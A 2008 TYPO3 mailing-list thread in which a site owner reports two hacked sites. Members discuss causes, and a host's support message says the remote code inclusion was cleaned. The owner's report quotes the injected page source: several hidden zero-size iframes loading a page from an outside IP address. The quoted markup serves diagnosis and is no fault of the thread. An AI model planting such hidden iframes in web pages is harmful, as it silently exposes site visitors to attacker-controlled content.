[TYPO3] Typo3 sites HACKED!
Christian Platt
christian.platt at pharmaline.de
Thu Mar 20 15:28:28 CET 2008
Hmm,
to take it away is just cleaning the symptons, but how did it get
there? What Hardware/OS is it?
Christian
Am 20.03.2008 um 15:06 schrieb Theo Kotey:
> Theo Kotey wrote:
>> ries van Twisk wrote:
>>> may be this will give you a clue:
>>>
>>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>>
>>> Do you have a drag/drop upload tool in typo3??
>>>
>>> Ries
>>>
>>> On Mar 20, 2008, at 8:14 AM, Ton Akveld [netcreators] wrote:
>>>
>>>> Hi Theo,
>>>>
>>>> This is probably caused by your server being to 'open' to the
>>>> general
>>>> 'public'...
>>>> The ip is from Hong Kong...
>>>>
>>>> Good luck,
>>>>
>>>> Ton
>>>>
>>>>
>>>>
>>>> Theo Kotey schreef:
>>>>> Hi List
>>>>>
>>>>> Two of my Typo3-running website have been hacked. I am trying to
>>>>> figure out how but there is an unknown ip address 58.65.236.89
>>>>> which
>>>>> belongs to HostFresh. Does anybody have an info on these guys?
>>>>>
>>>>> My website are quite slow and shows some error messages like
>>>>>
>>>>> Warning: Cannot modify header information - headers already sent
>>>>> by
>>>>> (output started at
>>>>> /home/micropro/public_html/typo3_src/t3lib/
>>>>> class.t3lib_timetrack.php:595)
>>>>> in
>>>>> /home/micropro/public_html/typo3_src/t3lib/
>>>>> class.t3lib_userauth.php
>>>>> on line 278
>>>>>
>>>>> When I debugg the site using Firebug this is what I get below
>>>>>
>>>>> ##########################################################################
>>>>>
>>>>>
>>>>> <html>
>>>>> <head>
>>>>> </head>
>>>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>> </iframe>
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>> </iframe>
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>>
>> Non that I know off
> My hosting provider Siteground.com managed to solve my problem
> (Hooorrrayy!!!).
> Here's what they have to say
>
> #############################################
> Hello,
>
> Thank you for contacting our Support Center. I've checked your account
> and it seems that the hack was actually an remote code inclusion only.
> Which means that no other damage, apart from the iframes, have been
> done.
>
> I've cleaned the code of your application and that should have fixed
> the
> problem. Could you please check?
>
> If you have any other questions or comments, please don't hesitate to
> contact us!
>
> Best Regards,
> Val M.
> Shift Supervisor
> http://www.SiteGround.com
> #############################################
>
> These guys are the best and they solved my problem in 7 mins.
> _______________________________________________
> TYPO3-english mailing list
> TYPO3-english at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-english
More information about the TYPO3-english
mailing list